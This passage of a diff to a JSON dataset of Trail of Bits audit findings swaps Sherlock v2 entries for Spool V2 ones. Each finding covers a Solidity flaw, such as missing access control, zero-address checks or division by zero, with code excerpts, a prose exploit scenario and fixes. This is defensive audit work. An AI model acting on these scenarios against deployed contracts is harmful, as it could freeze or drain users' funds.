", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Medium" ] }, { "title": "1. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "Sherlock has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by True and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the Sherlock contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Spool V2 has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by True and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the Spool V2 contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug.
Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", "Severity: Undetermined", @@ -4572,49 +7250,49 @@ ] }, { - "title": "2. Certain functions lack zero address checks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "Certain functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. For example, the AaveV2Strategy contract's constructor function does not validate the aaveLmReceiver, which is the address that receives Aave rewards on calls to AaveV2Strategy.claimRewards. constructor(IAToken _aWant, address _aaveLmReceiver) { aWant = _aWant; // This gets the underlying token associated with aUSDC (USDC) want = IERC20(_aWant.UNDERLYING_ASSET_ADDRESS()); // Gets the specific rewards controller for this token type aaveIncentivesController = _aWant.getIncentivesController(); aaveLmReceiver = _aaveLmReceiver; } Figure 2.1: managers/AaveV2Strategy.sol:39-47 If the aaveLmReceiver variable is set to the address zero, the Aave contract will revert with INVALID_TO_ADDRESS. This prevents any Aave rewards from being claimed for the designated token. The following functions are missing zero address checks: Manager.setSherlockCoreAddress AaveV2Strategy.sweep SherDistributionManager.sweep SherlockProtocolManager.sweep Sherlock.constructor Exploit Scenario Bob deploys AaveV2Strategy with aaveLmReceiver set to the zero address. All calls to claimRewards revert. Recommendations Short term, add zero address checks on all function arguments to ensure that users cannot accidentally set incorrect values. Long term, use Slither, which will catch functions that do not have zero address checks.", + "title": "2. Risk of SmartVaultFactory DoS due to lack of access controls on grantSmartVaultOwnership ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Anyone can set the owner of the next smart vault to be created, which will result in a DoS of the SmartVaultFactory contract. The grantSmartVaultOwnership function in the SpoolAccessControl contract allows anyone to set the owner of a smart vault. This function reverts if an owner is already set for the provided smart vault. function grantSmartVaultOwnership(address smartVault, address owner) external { if (smartVaultOwner[smartVault] != address(0)) { revert SmartVaultOwnerAlreadySet(smartVault); } smartVaultOwner[smartVault] = owner; } Figure 2.1: The grantSmartVaultOwnership function in SpoolAccessControl.sol The SmartVaultFactory contract implements two functions for deploying new smart vaults: the deploySmartVault function uses the create opcode, and the deploySmartVaultDeterministically function uses the create2 opcode. Both functions create a new smart vault and call the grantSmartVaultOwnership function to make the message sender the owner of the newly created smart vault. Any user can pre-compute the address of the new smart vault for a deploySmartVault transaction by using the address and nonce of the SmartVaultFactory contract; to compute the address of the new smart vault for a deploySmartVaultDeterministically transaction, the user could front-run the transaction to capture the salt provided by the user who submitted it.
Exploit Scenario Eve pre-computes the address of the new smart vault that will be created by the deploySmartVault function in the SmartVaultFactory contract. She then calls the grantSmartVaultOwnership function with the pre-computed address and a nonzero address as arguments. Now, every call to the deploySmartVault function reverts, making the SmartVaultFactory contract unusable. Using a similar strategy, Eve blocks the deploySmartVaultDeterministically function by front-running the user transaction to set the owner of the smart vault address computed using the user-provided salt. Recommendations Short term, add the onlyRole(ROLE_SMART_VAULT_INTEGRATOR, msg.sender) modifier to the grantSmartVaultOwnership function to restrict access to it. Long term, follow the principle of least privilege by restricting access to the functions that grant specific privileges to actors of the system.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: High", + "Difficulty: Low" ] }, { - "title": "3. updateYieldStrategy could leave funds in the old strategy ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "The updateYieldStrategy function sets a new yield strategy manager contract without calling yieldStrategy.withdrawAll() on the old strategy, potentially leaving funds in it. // Sets a new yield strategy manager contract /// @notice Update yield strategy /// @param _yieldStrategy New address of the strategy /// @dev try a yieldStrategyWithdrawAll() on old, ignore failure function updateYieldStrategy(IStrategyManager _yieldStrategy) external override onlyOwner { if (address(_yieldStrategy) == address(0)) revert ZeroArgument(); if (yieldStrategy == _yieldStrategy) revert InvalidArgument(); emit YieldStrategyUpdated(yieldStrategy, _yieldStrategy); yieldStrategy = _yieldStrategy; } Figure 3.1: contracts/Sherlock.sol:257-267 Even though one could re-add the old strategy to recover the funds, this issue could cause stakers and the protocols insured by Sherlock to lose trust in the system. This issue has a significant impact on the result of totalTokenBalanceStakers, which is used when calculating the shares in initialStake. totalTokenBalanceStakers uses the balance of the yield strategy. If the balance is missing the funds that should have been withdrawn from a previous strategy, the result will be incorrect. function totalTokenBalanceStakers() public view override returns (uint256) { return token.balanceOf(address(this)) + yieldStrategy.balanceOf() + sherlockProtocolManager.claimablePremiums(); } Figure 3.2: contracts/Sherlock.sol:151-156 function initialStake( uint256 _amount, uint256 _period, address _receiver ) external override whenNotPaused returns (uint256 _id, uint256 _sher) { ... if (totalStakeShares_ != 0) stakeShares_ = (_amount * totalStakeShares_) / (totalTokenBalanceStakers() - _amount); // If this is the first stake ever, we just mint stake shares equal to the amount of USDC staked else stakeShares_ = _amount; Figure 3.3: contracts/Sherlock.sol:483-504 Exploit Scenario Bob, the owner of the Sherlock contract, calls updateYieldStrategy with a new strategy. Eve calls initialStake and receives more shares than she is due because totalTokenBalanceStakers returns a significantly lower balance than it should.
Bob notices the missing funds, calls updateYieldStrategy with the old strategy and then yieldStrategy.withdrawAll to recover the funds, and switches back to the new strategy. Eve's shares now have notably more value. Recommendations Short term, in updateYieldStrategy, add a call to yieldStrategy.withdrawAll() on the old strategy. Long term, when designing systems that store funds, use extensive unit testing and property-based testing to ensure that funds cannot become stuck.", + "title": "3. Lack of zero-value check on constructors and initializers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Several contracts' constructors and initialization functions fail to validate incoming arguments. As a result, important state variables could be set to the zero address, which would result in the loss of assets. constructor( ISpoolAccessControl accessControl_, IAssetGroupRegistry assetGroupRegistry_, IRiskManager riskManager_, IDepositManager depositManager_, IWithdrawalManager withdrawalManager_, IStrategyRegistry strategyRegistry_, IMasterWallet masterWallet_, IUsdPriceFeedManager priceFeedManager_, address ghostStrategy ) SpoolAccessControllable(accessControl_) { _assetGroupRegistry = assetGroupRegistry_; _riskManager = riskManager_; _depositManager = depositManager_; _withdrawalManager = withdrawalManager_; _strategyRegistry = strategyRegistry_; _masterWallet = masterWallet_; _priceFeedManager = priceFeedManager_; _ghostStrategy = ghostStrategy; } Figure 3.1: The SmartVaultManager contract's constructor function in spool-v2-core/SmartVaultManager.sol#L111-L130 These constructors include that of the SmartVaultManager contract, which sets the _masterWallet address (figure 3.1). The SmartVaultManager contract is the entry point of the system and is used by users to deposit their tokens. User deposits are transferred to the _masterWallet address (figure 3.2). function _depositAssets(DepositBag calldata bag) internal returns (uint256) { [...] for (uint256 i; i < deposits.length; ++i) { IERC20(tokens[i]).safeTransferFrom(msg.sender, address(_masterWallet), deposits[i]); } [...] } Figure 3.2: The _depositAssets function in spool-v2-core/SmartVaultManager.sol#L649-L676 If _masterWallet is set to the zero address, the tokens will be transferred to the zero address and will be lost permanently. The constructors and initialization functions of the following contracts also fail to validate incoming arguments: StrategyRegistry DepositSwap SmartVault SmartVaultFactory SpoolAccessControllable DepositManager RiskManager SmartVaultManager WithdrawalManager RewardManager RewardPool Strategy Exploit Scenario Bob deploys the Spool system. During deployment, Bob accidentally sets the _masterWallet parameter of the SmartVaultManager contract to the zero address. Alice, excited about the new protocol, deposits 1 million WETH into it. Her deposited WETH tokens are transferred to the zero address, and Alice loses 1 million WETH. Recommendations Short term, add zero-value checks on all constructor arguments to ensure that the deployer cannot accidentally set incorrect values. Long term, use Slither, which will catch functions that do not have zero-value checks.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: High" ] }, { - "title": "4.
Pausing and unpausing the system may not be possible when removing or replacing connected contracts ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "The Sherlock contract allows all of the connected contracts to be paused or unpaused at the same time. However, if the sherDistributionManager contract is removed, or if any of the connected contracts are replaced when the system is paused, it might not be possible to pause or unpause the system. function removeSherDistributionManager() external override onlyOwner { if (address(sherDistributionManager) == address(0)) revert InvalidConditions(); emit SherDistributionManagerUpdated( sherDistributionManager, ISherDistributionManager(address(0)) ); delete sherDistributionManager; } Figure 4.1: contracts/Sherlock.sol:206-214 Of all the connected contracts, the only one that can be removed is the sherDistributionManager contract. On the other hand, all of the connected contracts can be replaced through an update function. function pause() external onlyOwner { _pause(); yieldStrategy.pause(); sherDistributionManager.pause(); sherlockProtocolManager.pause(); sherlockClaimManager.pause(); } /// @notice Unpause external functions in all contracts function unpause() external onlyOwner { _unpause(); yieldStrategy.unpause(); sherDistributionManager.unpause(); sherlockProtocolManager.unpause(); sherlockClaimManager.unpause(); } Figure 4.2: contracts/Sherlock.sol:302-317 If the sherDistributionManager contract is removed, a call to Sherlock.pause will revert, as it is attempting to call the zero address. If sherDistributionManager is removed while the system is paused, then a call to Sherlock.unpause will revert for the same reason. If any of the contracts is replaced while the system is paused, the replaced contract will be in an unpaused state while the other contracts are still paused. As a result, a call to Sherlock.unpause will revert, as it is attempting to unpause an already unpaused contract. Exploit Scenario Bob, the owner of the Sherlock contract, pauses the system to replace the sherlockProtocolManager contract, which contains a bug. Bob deploys a new sherlockProtocolManager contract and calls updateSherlockProtocolManager to set the new address in the Sherlock contract. To unpause the system, Bob calls Sherlock.unpause, which reverts because sherlockProtocolManager is already unpaused. Recommendations Short term, add conditional checks to the Sherlock.pause and Sherlock.unpause functions to check that a contract is either paused or unpaused, as expected, before attempting to update its state. For sherDistributionManager, the check should verify that the contract to be paused or unpaused is not the zero address. Long term, for pieces of code that depend on the states of multiple contracts, implement unit tests that cover each possible combination of contract states.", + "title": "4. Upgradeable contracts set state variables in the constructor ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The state variables set in the constructor of the RewardManager implementation contract are not visible in the proxy contract, making the RewardManager contract unusable. The same issue exists in the RewardPool and Strategy smart contracts.
Upgradeable smart contracts using the delegatecall proxy pattern should implement an initializer function to set state variables in the proxy contract storage. The constructor function can be used to set immutable variables in the implementation contract because these variables do not consume storage slots and their values are inlined in the deployed code. The RewardManager contract is deployed as an upgradeable smart contract, but it sets the state variable _assetGroupRegistry in the constructor function. contract RewardManager is IRewardManager, RewardPool, ReentrancyGuard { ... /* ========== STATE VARIABLES ========== */ /// @notice Asset group registry IAssetGroupRegistry private _assetGroupRegistry; ... constructor( ISpoolAccessControl spoolAccessControl, IAssetGroupRegistry assetGroupRegistry_, bool allowPoolRootUpdates ) RewardPool(spoolAccessControl, allowPoolRootUpdates) { _assetGroupRegistry = assetGroupRegistry_; } Figure 4.1: The constructor function in spool-v2-core/RewardManager.sol The value of the _assetGroupRegistry variable will not be visible in the proxy contract, and the admin will not be able to add reward tokens to smart vaults, making the RewardManager contract unusable. The following smart contracts are also affected by the same issue: 1. The ReentrancyGuard contract, which is non-upgradeable and is extended by RewardManager 2. The RewardPool contract, which sets the state variable allowUpdates in the constructor 3. The Strategy contract, which sets the state variable StrategyName in the constructor Exploit Scenario Bob creates a smart vault and wants to add a reward token to it. He calls the addToken function on the RewardManager contract, but the transaction unexpectedly reverts. Recommendations Short term, make the following changes: 1. Make _assetGroupRegistry an immutable variable in the RewardManager contract. 2. Extend the ReentrancyGuardUpgradeable contract in the RewardManager contract. 3. Make allowUpdates an immutable variable in the RewardPool contract. 4. Move the statement _strategyName = strategyName_; from the Strategy contract's constructor to the contract's __Strategy_init function. 5. Review all of the upgradeable contracts to ensure that they extend only upgradeable library contracts and that the inherited contracts have a __gap storage variable to prevent storage collision issues with future upgrades. Long term, review all of the upgradeable contracts to ensure that they use the initializer function instead of the constructor function to set state variables. Use slither-check-upgradeability to find issues related to upgradeable smart contracts. 5. Insufficient validation of oracle price data Severity: Low Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-5 Target: managers/UsdPriceFeedManager.sol", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: Low" ] }, { - "title": "5. SHER reward calculation uses confusing six-decimal SHER reward rate ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "The reward calculation in calcReward uses a six-decimal SHER reward rate value. This might confuse readers and developers of the contracts because the SHER token has 18 decimals, and the calculated reward will also have 18 decimals. Also, this value does not allow the SHER reward rate to be set below 0.000001000000000000 SHER.
function calcReward( uint256 _tvl, uint256 _amount, uint256 _period ) public view override returns (uint256 _sher) { [..] // If there are some max rewards available... if (maxRewardsAvailable != 0) { // And if the entire stake is still within the maxRewardsAvailable amount if (_amount <= maxRewardsAvailable) { // Then the entire stake amount should accrue max SHER rewards return (_amount * maxRewardsRate * _period) * DECIMALS; } else { // Otherwise, the stake takes all the maxRewardsAvailable left // We add the maxRewardsAvailable amount to the TVL (now _tvl _tvl += maxRewardsAvailable; // We subtract the amount of the stake that received max rewards _amount -= maxRewardsAvailable; // We accrue the max rewards available at the max rewards // This could be: $20M of maxRewardsAvailable which gets // Calculation continues after this _sher += (maxRewardsAvailable * maxRewardsRate * _period) * DECIMALS; } } // If there are SHER rewards still available if (slopeRewardsAvailable != 0) { _sher += (((zeroRewardsStartTVL - position) * _amount * maxRewardsRate * _period) / (zeroRewardsStartTVL - maxRewardsEndTVL)) * DECIMALS; } } Figure 5.1: contracts/managers/SherDistributionManager.sol:89-149 In the reward calculation, the 6-decimal maxRewardsRate is first multiplied by _amount and _period, resulting in a 12-decimal intermediate product. To output a final 18-decimal product, this 12-decimal product is multiplied by DECIMALS to add 6 decimals. Although this leads to a correct result, it would be clearer to use an 18-decimal value for maxRewardsRate and to divide by DECIMALS at the end of the calculation. // using 6 decimal maxRewardsRate (10e6 * 1e6 * 10) * 1e6 = 100e18 = 100 SHER // using 18 decimal maxRewardsRate (10e6 * 1e18 * 10) / 1e6 = 100e18 = 100 SHER Figure 5.2: Comparison of a 6-decimal and an 18-decimal maxRewardsRate Exploit Scenario Bob, a developer of the Sherlock protocol, writes a new version of the SherDistributionManager contract that changes the reward calculation. He mistakenly assumes that the SHER maxRewardsRate has 18 decimals and updates the calculation incorrectly. As a result, the newly calculated reward is incorrect. Recommendations Short term, use an 18-decimal value for maxRewardsRate and divide by DECIMALS instead of multiplying. Long term, when implementing calculations that use the rate of a given token, strive to use a rate variable with the same number of decimals as the token. This will prevent any confusion with regard to decimals, which might lead to introducing precision bugs when updating the contracts.", + "title": "6. Incorrect handling of fromVaultsOnly in removeStrategy ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The removeStrategy function allows Spool admins to remove a strategy from the smart vaults using it. Admins are also able to remove the strategy from the StrategyRegistry contract, but only if the value of fromVaultsOnly is false; however, the implementation enforces the opposite, as shown in figure 6.1. function removeStrategy(address strategy, bool fromVaultsOnly) external { _checkRole(ROLE_SPOOL_ADMIN, msg.sender); _checkRole(ROLE_STRATEGY, strategy); ...
if (fromVaultsOnly) { _strategyRegistry.removeStrategy(strategy); } } Figure 6.1: The removeStrategy function in spool-v2-core/SmartVaultManager.sol#L298-L317 Exploit Scenario Bob, a Spool admin, calls removeStrategy with fromVaultsOnly set to true, believing that this call will not remove the strategy from the StrategyRegistry contract. However, once the transaction is executed, he discovers that the strategy was indeed removed. Recommendations Short term, replace if (fromVaultsOnly) with if (!fromVaultsOnly) in the removeStrategy function to implement the expected behavior. Long term, improve the system's unit and integration tests to catch issues such as this one.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: Medium" ] }, { - "title": "6. A claim cannot be paid out or escalated if the protocol agent changes after the claim has been initialized ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "The escalate and payoutClaim functions can be called only by the protocol agent that started the claim. Therefore, if the protocol agent role is reassigned after a claim is started, the new protocol agent will be unable to call these functions and complete the claim. function escalate(uint256 _claimID, uint256 _amount) external override nonReentrant whenNotPaused { if (_amount < BOND) revert InvalidArgument(); // Gets the internal ID of the claim bytes32 claimIdentifier = publicToInternalID[_claimID]; if (claimIdentifier == bytes32(0)) revert InvalidArgument(); // Retrieves the claim struct Claim storage claim = claims_[claimIdentifier]; // Requires the caller to be the protocol agent if (msg.sender != claim.initiator) revert InvalidSender(); Figure 6.1: contracts/managers/SherlockClaimManager.sol:388-403 Due to this scheme, care should be taken when updating the protocol agent. That is, the protocol agent should not be reassigned if there is an existing claim. However, if the protocol agent is changed when there is an existing claim, the protocol agent role could be transferred back to the original protocol agent to complete the claim. Exploit Scenario Alice is the protocol agent and starts a claim. Alice transfers the protocol agent role to Bob. The claim is approved by SPCC and can be paid out. Bob calls payoutClaim, but the transaction reverts. Recommendations Short term, update the comment in the escalate and payoutClaim functions to state that the caller needs to be the protocol agent that started the claim, and clearly describe this requirement in the protocol agent documentation. Alternatively, update the check to verify that msg.sender is the current protocol agent rather than specifically the protocol agent who initiated the claim. Long term, review and document the effects of the reassignment of privileged roles on the system's state transitions. Such a review will help uncover cases in which the reassignment of privileged roles causes issues and possibly a denial of service to (part of) the system.", + "title": "7.
Risk of LinearAllocationProvider and ExponentialAllocationProvider reverts due to division by zero ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The LinearAllocationProvider and ExponentialAllocationProvider contracts' calculateAllocation functions can revert due to a division-by-zero error: LinearAllocationProvider's function reverts when the sum of the strategies' APY values is 0, and ExponentialAllocationProvider's function reverts when a single strategy has an APY value of 0. Figure 7.1 shows a snippet of the LinearAllocationProvider contract's calculateAllocation function; if the apySum variable, which is the sum of all the strategies' APY values, is 0, a division-by-zero error will occur.
uint8[] memory arrayRiskScores = data.riskScores;
for (uint8 i; i < data.apys.length; ++i) {
    apySum += (data.apys[i] > 0 ? uint256(data.apys[i]) : 0);
    riskSum += arrayRiskScores[i];
}
uint8 riskt = uint8(data.riskTolerance + 10); // from 0 to 20
for (uint8 i; i < data.apys.length; ++i) {
    uint256 apy = data.apys[i] > 0 ? uint256(data.apys[i]) : 0;
    apy = (apy * FULL_PERCENT) / apySum;
Figure 7.1: Part of the calculateAllocation function in spool-v2-core/LinearAllocationProvider.sol#L39-L49 Figure 7.2 shows that for the ExponentialAllocationProvider contract's calculateAllocation function, if the call to log_2 occurs with partApy set to 0, the function will revert because of log_2's require statement, shown in figure 7.3.
for (uint8 i; i < data.apys.length; ++i) {
    uint256 uintApy = (data.apys[i] > 0 ? uint256(data.apys[i]) : 0);
    int256 partRiskTolerance = fromUint(uint256(riskArray[uint8(20 - riskt)]));
    partRiskTolerance = div(partRiskTolerance, _100);
    int256 partApy = fromUint(uintApy);
    partApy = div(partApy, _100);
    int256 apy = exp_2(mul(partRiskTolerance, log_2(partApy)));
Figure 7.2: Part of the calculateAllocation function in spool-v2-core/ExponentialAllocationProvider.sol#L323-L331
function log_2(int256 x) internal pure returns (int256) {
    unchecked {
        require(x > 0);
Figure 7.3: Part of the log_2 function in spool-v2-core/ExponentialAllocationProvider.sol#L32-L34 Exploit Scenario Bob deploys a smart vault with two strategies using the ExponentialAllocationProvider contract. At some point, one of the strategies has 0 APY, causing the transaction call to reallocate the assets to unexpectedly revert. Recommendations Short term, modify both versions of the calculateAllocation function so that they correctly handle cases in which a strategy's APY is 0. Long term, improve the system's unit and integration tests to ensure that the basic operations work as expected.", "labels": [ "Trail of Bits", "Severity: Medium", @@ -4622,39 +7300,29 @@ ] }, { - "title": "7. Missing input validation in setMinActiveBalance could cause a confusing event to be emitted ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "The setMinActiveBalance function's input validation is incomplete: it should check that the minActiveBalance has not been set to its existing value, but this check is missing. Additionally, if the minActiveBalance is set to its existing value, the emitted MinBalance event will indicate that the old and new values are identical. This could confuse systems monitoring the contract that expect this event to be emitted only when the minActiveBalance changes. 
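// Reviewer note (not in the original source): the event below is emitted even
// when _minActiveBalance equals the current minActiveBalance, so monitoring
// systems cannot assume the value actually changed.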
function setMinActiveBalance(uint256 _minActiveBalance) external override onlyOwner {
    // Can't set a value that is too high to be reasonable
    require(_minActiveBalance < MIN_BALANCE_SANITY_CEILING, 'INSANE');
    emit MinBalance(minActiveBalance, _minActiveBalance);
    minActiveBalance = _minActiveBalance;
}
Figure 7.1: contracts/managers/SherlockProtocolManager.sol:422-428 Exploit Scenario An off-chain monitoring system controlled by the Sherlock protocol is listening for events that indicate that a contract configuration value has changed. When such events are detected, the monitoring system sends an email to the admins of the Sherlock protocol. Alice, a contract owner, calls setMinActiveBalance with the existing minActiveBalance as input. The off-chain monitoring system detects the emitted event and notifies the Sherlock protocol admins. The Sherlock protocol admins are confused since the value did not change. Recommendations Short term, add input validation that causes setMinActiveBalance to revert if the proposed minActiveBalance value equals the current value. Long term, document and test the expected behavior of all the system's events. Consider using a blockchain-monitoring system to track any suspicious behavior in the contracts.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, { - "title": "8. payoutClaims calling of external contracts in a loop could cause a denial of service ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "The payoutClaim function uses a loop to call the PreCorePayoutCallback function on a list of external contracts. If any of these calls reverts, the entire payoutClaim function reverts, and, hence, the transaction reverts. This may not be the desired behavior; if that is the case, a denial of service would prevent claims from being paid out.
for (uint256 i; i < claimCallbacks.length; i++) {
    claimCallbacks[i].PreCorePayoutCallback(protocol, _claimID, amount);
}
Figure 8.1: contracts/managers/SherlockClaimManager.sol:499-501 The owner of the SherlockClaimManager contract controls the list of contracts on which the PreCorePayoutCallback function is called. The owner can add or remove contracts from this list at any time. Therefore, if a contract is causing unexpected reverts, the owner can fix the problem by (temporarily) removing that contract from the list. It might be expected that some of these calls revert and cause the entire transaction to revert. However, the external contracts that will be called and the expected behavior in the event of a revert are currently unknown. If a revert should not cause the entire transaction to revert, the current implementation does not fulfill that requirement. To accommodate both cases (a revert of an external call either reverts the entire transaction or allows the transaction to continue), a middle road can be taken. For each contract in the list, a boolean could indicate whether the transaction should revert or continue if the external call fails. If the boolean indicates that the transaction should continue, an emitted event would indicate the contract address and the input arguments of the callback that reverted. This would allow the system to continue functioning while admins investigate the cause of the revert and fix the issue(s) if needed. Exploit Scenario Alice, the owner of the SherlockClaimManager contract, registers contract A in the list of contracts on which PreCorePayoutCallback is called. 
Contract A contains a bug that causes the callback to revert every time. Bob, a protocol agent, successfully files a claim and calls payoutClaim. The transaction reverts because the call to contract A reverts. Recommendations Short term, review the requirements of contracts that will be called by callback functions, and adjust the implementation to fulfill those requirements. Long term, when designing a system reliant on external components that have not yet been determined, carefully consider whether to include those integrations during the development process or to wait until those components have been identified. This will prevent unforeseen problems due to incomplete or incorrect integrations with unknown contracts.", + "title": "8. Strategy APYs are never updated ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The _updateDhwYieldAndApy function is never called. As a result, each strategy's APY will constantly be set to 0.
function _updateDhwYieldAndApy(address strategy, uint256 dhwIndex, int256 yieldPercentage) internal {
    if (dhwIndex > 1) {
        unchecked {
            int256 timeDelta = int256(block.timestamp - _stateAtDhw[address(strategy)][dhwIndex - 1].timestamp);
            if (timeDelta > 0) {
                int256 normalizedApy = yieldPercentage * SECONDS_IN_YEAR_INT / timeDelta;
                int256 weight = _getRunningAverageApyWeight(timeDelta);
                _apys[strategy] = (_apys[strategy] * (FULL_PERCENT_INT - weight) + normalizedApy * weight) / FULL_PERCENT_INT;
            }
        }
    }
}
Figure 8.1: The _updateDhwYieldAndApy function in spool-v2-core/StrategyManager.sol#L298-L317 A strategy's APY is one of the parameters used by an allocator provider to decide where to allocate the assets of a smart vault. If a strategy's APY is 0, the LinearAllocationProvider and ExponentialAllocationProvider contracts will both revert when calculateAllocation is called due to a division-by-zero error.
// set allocation
if (uint16a16.unwrap(allocations) == 0) {
    _riskManager.setRiskProvider(smartVaultAddress, specification.riskProvider);
    _riskManager.setRiskTolerance(smartVaultAddress, specification.riskTolerance);
    _riskManager.setAllocationProvider(smartVaultAddress, specification.allocationProvider);
    allocations = _riskManager.calculateAllocation(smartVaultAddress, specification.strategies);
}
Figure 8.2: Part of the _integrateSmartVault function, which is called when a vault is created, in spool-v2-core/SmartVaultFactory.sol#L313-L320 When a vault is created, the code in figure 8.2 is executed. For vaults whose strategyAllocation variable is set to 0, which means the value will be calculated by the smart contract, and whose allocationProvider variable is set to the LinearAllocationProvider or ExponentialAllocationProvider contract, the creation transaction will revert due to a division-by-zero error. Transactions for creating vaults with a nonzero strategyAllocation and with the same allocationProvider values mentioned above will succeed; however, the fund reallocation operation will revert because the _updateDhwYieldAndApy function is never called, causing the strategies' APYs to be set to 0, in turn causing the same division-by-zero error. Refer to finding TOB-SPL-7, which is related to this issue; even if that finding is fixed, incorrect results would still occur because of the missing _updateDhwYieldAndApy calls. Exploit Scenario Bob tries to deploy a smart vault with strategyAllocation set to 0 and allocationProvider set to LinearAllocationProvider. 
The transaction unexpectedly fails. Recommendations Short term, add calls to _updateDhwYieldAndApy where appropriate. Long term, improve the system's unit and integration tests to ensure that the basic operations work as expected.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Medium" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "9. pullReward could silently fail and cause stakers to lose all earned SHER rewards ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "If the SherDistributionManager.pullReward function reverts, the calling function (_stake) will not set the SHER rewards in the staker's position NFT. As a result, the staker will not receive the payout of SHER rewards after the stake period has passed.
function _stake(
    uint256 _amount,
    uint256 _period,
    uint256 _id,
    address _receiver
) internal returns (uint256 _sher) {
    // Sets the timestamp at which this position can first be unstaked/restaked
    lockupEnd_[_id] = block.timestamp + _period;
    if (address(sherDistributionManager) == address(0)) return 0;
    // Does not allow restaking of 0 tokens
    if (_amount == 0) return 0;
    // Checks this amount of SHER tokens in this contract before we transfer new ones
    uint256 before = sher.balanceOf(address(this));
    // pullReward() calcs then actually transfers the SHER tokens to this contract
    try sherDistributionManager.pullReward(_amount, _period, _id, _receiver) returns (
        uint256 amount
    ) {
        _sher = amount;
    } catch (bytes memory reason) {
        // If for whatever reason the sherDistributionManager call fails
        emit SherRewardsError(reason);
        return 0;
    }
    // actualAmount should represent the amount of SHER tokens transferred to this contract for the current stake position
    uint256 actualAmount = sher.balanceOf(address(this)) - before;
    if (actualAmount != _sher) revert InvalidSherAmount(_sher, actualAmount);
    // Assigns the newly created SHER tokens to the current stake position
    sherRewards_[_id] = _sher;
}
Figure 9.1: contracts/Sherlock.sol:354-386 When the pullReward call reverts, the SherRewardsError event is emitted. The staker could check this event and see that no SHER rewards were set. The staker could also call the sherRewards function and provide the position's NFT ID to check whether the SHER rewards were set. However, stakers should not be expected to make these checks after every (re)stake. There are two ways in which the pullReward function can fail. First, a bug in the arithmetic could cause an overflow and revert the function. Second, if the SherDistributionManager contract does not hold enough SHER to be able to transfer the calculated amount, the pullReward function will fail. The SHER balance of the contract needs to be manually topped up. If a staker detects that no SHER was set for her (re)stake, she may want to cancel the stake. However, stakers are not able to cancel a stake until the stake's period has passed (currently, at least three months). Exploit Scenario Alice creates a new stake, but the SherDistributionManager contract does not hold enough SHER to transfer the rewards, and the internal pullReward call reverts. The execution continues and sets Alice's stake allocation to zero. Recommendations Short term, have the system revert transactions if pullReward reverts. Long term, have the system revert transactions if part of the expected rewards are not allocated due to an internal revert. 
